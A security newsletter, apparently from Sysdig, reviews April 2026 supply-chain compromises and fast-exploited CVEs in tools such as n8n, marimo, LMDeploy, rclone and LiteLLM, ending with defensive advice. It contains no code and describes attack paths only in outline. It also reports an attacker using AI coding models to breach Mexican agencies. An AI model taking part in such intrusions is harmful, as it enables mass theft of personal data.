Does your infrastructure have trust issues?

Supply chain failure is the gift that keeps on giving, or should I say taking? The vulnerabilities, the exploitation, the breaches…these are inevitable, we know that. None of these are surprising anymore. The need for an “assume breach” mindset has become all too real. 

In April, trusted platforms like GitHub, HuggingFace, n8n, and Vercel became playgrounds for high-speed credential theft and lateral movement. Let’s dig into this month’s Security Briefing:

Apr 19: Vercel OAuth supply chain pivot

• The attacker used a compromised OAuth app to move from the initial breach at context.ai to a Vercel employee’s account. 
• While sensitive environment variables were encrypted, the attacker was able to scrape API keys and passwords left in non-sensitive fields by enumerating accessible projects. Oops. 
• Vercel revoked the malicious OAuth app, invalidated tokens, and advised customers to rotate credentials and hunt for signs of a breach. 
• Unfortunately, this incident highlights a common misconfiguration failure and reinforces the fact that identity remains the weakest link in otherwise well-secured environments. 

Apr 22: Trivy supply chain nightmare persists

• As a result of the Trivy incident last month, a threat actor published malicious code on Checkmarx’s GitHub repositories on March 23. A month later, on April 22, malicious Docker images and other extensions of the Checkmarx KICS scanner image were published.
• And to continue down the supply chain, a malicious Bitwarden CLI version was also published on April 22, though it was only exposed for 90 minutes.
• Anyone who downloaded the malicious versions should assume breach, because for a short period of time, your security product was essentially shipping credential theft. Revert to known safe versions and quickly rotate credentials. 
• The payloads in the malicious images harvested tokens, keys, and AI configurations, and then the stolen credentials were used to inject malware directly into the victims’ workflows in their own repositories. This is the nightmare that is a supply chain attack.

Mid-April: A dozen n8n vulnerabilities

• There were several moderate to critical level vulnerabilities that dropped in the n8n GitHub repository in mid April, and they didn’t make it in a news cycle.
• n8n is an extremely popular workflow automation platform, and users frequently store API keys, tokens, and secrets within it in order to automate SaaS workflows.
• These vulnerabilities permit RCE, credential exposure, and privilege escalation and stem from flaws like improper input validation, SQL injection, and sandbox escape. Some of the attack paths require authenticated access, but this is hardly a barrier when instances are exposed, or credentials are weak or reused. 
• Review the vulnerability list and make adjustments as necessary. Otherwise, this could get messy; successful exploitation could lead to widespread downstream impact across connected services within your organization.

Additional Sysdig TRT findings

Marimo vulnerability weaponized again and again

• Less than 10 hours after a remote code execution vulnerability was disclosed for the marimo Python notebook tool, the Sysdig TRT was seeing active exploitation. 
• CVE-2026-39987 is a pre-authorization RCE that allows an attacker to grab a shell via a WebSocket endpoint access with no credentials required.
• This tool is by no means a household enterprise staple, with a fraction of the GitHub stars as compared to Langflow or n8n. Still, several threat actors took full advantage of this Jupyter alternative, and walked away with credentials. 
• Less than a week after the first exploitation attempts were discovered, the Sysdig TRT found an attacker using a previously undocumented NKAbuse variant to deploy a blockchain botnet via HuggingFace. 
• Fortunately, existing runtime detections will trigger on several of the steps identified in the attacks using the marimo vulnerability. 

LMDeploy LLM inference engine exploited

• On April 22, Sysdig TRT published a blog on active exploitation attempts only 12 hours after the advisory for CVE-2026-33626 was published.
• Yet another niche open source tool, LMDeploy serves vision-language models through an OpenAI-compatible HTTP API.
• Within 8 minutes, an attacker used the Server-Side Request Forgery (SSRF) vulnerability to port scan the victim’s network and move through the cloud environment.
• This kind of attack can be identified with runtime detection at both the application and host layers. 

rclone vulnerability exploited

•  Sysdig TRT did not write a formal blog for CVE-2026-41179, but check out the team director, Mike Clark’s, LinkedIn post. (We were concerned you might unsubscribe if we reported yet another internet-facing service breach in April…)
• This vulnerability, like the two above, was also exploited in less than a day. 
• Since rclone is frequently embedded in automation scripts and backup workflows, successful exploitation provides both immediate data access and persistence opportunities. 
• With an unauthenticated single request via WebDAV, exploitation of this popular cloud storage tool could lead to extensive access, credential exposure, data exfiltration, or malware staging – basically anything. 

LiteLLM vulnerability targeted

• In an interesting turn of events, considering how the rest of the month’s vulnerability exploitation went, a critical pre-authentication SQL injection flaw in LiteLLM was exploited 36 hours after it was disclosed.
• Rather than the standard SQLmap spray against an SQL injection vulnerability, this attacker intentionally targeted high-value secret tables within LiteLLM’s schema. 
• While the captured attack did not result in exfiltration, exploitation could result in stolen keys and credentials. 

Also in the news

• Mexican agencies hacked by AI: A single attacker used Claude Code and OpenAI’s GPT-4.1 to generate thousands of commands, resulting in access to hundreds of millions of personal records across 9 different government organizations. The attack was recently reported, but took place between December 2025 and February 2026. The scale of the attack is wild. 
• Salesforce launches headless offering: On April 15, Salesforce introduced the next leap forward for all things AI, Salesforce Headless 360, built for agents. With this, there is no need to leave the window of your preferred CLI, and there are no limitations to what the output looks like – it’s at the hands of your imagination.
• UK’s Cyber Security and Resilience Bill presses on: As of late April, the UK government stated the bill made it through a second reading and committee stage in the House of Commons. The significance of this bill keeps critical services and suppliers at the forefront of security oversight because supply chains are very much so within the attack blast radius. 

Closing thoughts

So what do you do when you know it’s coming, but you don’t know where or how? Detect it fast and contain it faster. Speed and the element of surprise are an attacker’s advantage for which defenders are liable. But we aren’t talking about just supply chain risk anymore. These issues are stemming from our implicit trust in integrations, automation, and data paths. Attackers don’t need zero-days when poorly configured and over-permissioned automation sprawl is making their job easy. 

Remember this old warning: “Don’t trust everything you read on the internet”? Well, same idea. Don’t trust every tool because it plugs in nicely. If a tool can access secrets, move data, or trigger actions, it’s a high-priority part of your attack surface. Don’t stop using these tools, just watch them closely.

Cloud detection & response

Kubernetes & Container Security